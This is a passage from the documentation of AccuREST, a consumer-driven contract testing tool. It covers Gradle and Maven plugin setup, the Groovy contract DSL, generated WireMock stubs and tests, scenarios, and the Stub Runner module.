{\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nAccurest Maven Plugins generates verification code into directory `\/generated-test-sources\/accurest` and attach this directory to `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke `mvn generateTest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using: `mvn generateStubs` command. By default generated WireMock mapping is stored in directory `target\/mappings`. Your project should create from this generated mappings additional artifact with classifier `stubs` for easy deploy to maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nContract DSL in AccuREST is written in Groovy, but don't be alarmed if you didn't use Groovy before. Knowledge of the language is not really needed as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in example above. If you didn't find what you are looking for, please check next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nFollowing methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nHTTP protocol requires only **method and address** to be specified in a request. The same information is mandatory in request definition of AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify whole `url` instead of just path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nRequest may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n \/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ using identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contains passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` functions tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\n**Body's format** can also be specified explicitly by invoking one of format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nMinimal response must contain **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides status response may contain **headers** and **body**, which are specified the same way as in the request (see previous paragraph).\n\n## Regular expressions\nYou can use regular expressions to write your requests in Contract DSL. It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your test and your server side tests.\n\n Please see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) }))\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameter for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that should be present 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\nIt is also possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support JAX-RS 2 Client API. Base class needs to define `protected WebTarget webTarget` and server initialization, right now the only option how to test JAX-RS API is to start a web server.\n\nRequest with a body needs to have a content type set otherwise `application\/octet-stream` is going to be used.\n\nIn order to use JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nExample of a test API generated:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a Wiremock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from the Wiremock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. Server Side\n\nBeing a service Y since you are developing your stub, you need to be sure that it's actually resembling your\nconcrete implementation. You can't have a situation where your stub acts in one way and your application on\nproduction behaves in a different way.\n\nThat's why from the provided stub acceptance tests will be generated that will ensure\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values as request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is to stick to proper naming convention while creating your contracts. The convention requires to include order number followed by the underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch tree will cause Accurest generating Wiremock's scenario with name `scenario1` and three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\nMore details about Wiremock scenarios can be found under [http:\/\/wiremock.org\/stateful-behaviour.html](http:\/\/wiremock.org\/stateful-behaviour.html)\n\nAccurest will also generate tests with guaranteed order of execution.\n\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was to pass the generated WireMock JSON stubs from the server side to the client side (or various clients). Copying the JSON files manually is out of the question.\n\nIn this article you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. For example you can keep them as JARs in a Maven repository.\n\n### Gradle\n\nExample of AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\twiremockStubsOutputDirRoot = file(\"${project.buildDir}\/production\/${project.name}-stubs\/\")\n\t\twiremockStubsOutputDir = new File(wiremockStubsOutputDirRoot)\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nExample of Maven can be found in the [AccuREST Maven Plugin README](https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar)\n\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (that includes also the local Maven repository) and starting the WireMock server for each of those stubs.\n\n### Modules\n\nAccuREST comes with a new structure of modules\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains core logic of Stub Runner. Gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. Defaults to 'false'\n (default: false)\n----\n\nYou can either produce a fat-jar and run the app like presented above.\n\nYou can also configure the stub runner by either passing the full arguments list with the `-Pargs` like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor each parameter separately with a `-P` prefix and without the hyphen (-) in the name of the param\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for given group and artifact id:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n .downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nAfter that rule gets executed Stub Runner connects to your Maven repository and for the given list of dependencies tries to:\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses [Groovy's Grape](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) mechanism to download the Maven dependencies. Check their [docs](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) for more information.\n\nSince the `AccurestRule` implements the `StubFinder` it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub.\n\t *\n\t * @param groupId - might be null. In that case a search only via artifactId takes place\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String groupId, String artifactId)\n\n\t\/**\n\t * For the given Ivy notation {@code groupId:artifactId} tries to find the matching\n\t * URL of the running stub. You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the 